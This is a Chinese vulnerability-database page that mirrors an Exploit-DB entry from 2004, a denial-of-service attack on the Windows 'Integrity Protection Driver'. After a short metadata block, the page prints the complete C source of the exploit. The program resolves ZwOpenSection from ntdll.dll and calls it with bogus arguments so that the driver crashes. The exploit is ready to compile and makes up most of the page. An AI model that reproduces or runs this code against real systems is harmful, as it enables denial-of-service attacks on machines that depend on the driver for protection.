IPD (Integrity Protection Driver) – Denial of Service

32次阅读
没有评论

IPD (Integrity Protection Driver) – Denial of Service

漏洞ID 1054556 漏洞类型
发布时间 2004-08-18 更新时间 2004-08-18
IPD (Integrity Protection Driver) - Denial of ServiceCVE编号 N/A
IPD (Integrity Protection Driver) - Denial of ServiceCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/403
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 
*   ipd-dos.c 
* 
*   Copyright (c) 2002-2004 By Next Generation Security S.L. 
*   All rights   reserved 
* 
*   Compiles with: cl ipd-dos.c 
* 
*   Madrid, August 2004 
*/ 

#include <windows.h> 

#define MY_NULL 0x01 
typedef DWORD (* zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa); 

int main(int argc, char *argv[]) { 
HINSTANCE dll; 
zwopensection_TYPE my_ZwOpenSection; 

  if ((dll=LoadLibrary("ntdll.dll"))!=NULL) { 

    if ((my_ZwOpenSection=(zwopensection_TYPE)GetProcAddress(dll,"ZwOpenSection"))!=NULL) { 

        my_ZwOpenSection(MY_NULL,MY_NULL,MY_NULL); 

    } 
  } 

} 

// milw0rm.com [2004-08-18]

相关推荐: Elm Message-ID Buffer Overflow Vulnerability

Elm Message-ID Buffer Overflow Vulnerability 漏洞ID 1103086 漏洞类型 Boundary Condition Error 发布时间 2001-07-03 更新时间 2001-07-03 CVE编号 N/A …

正文完
 0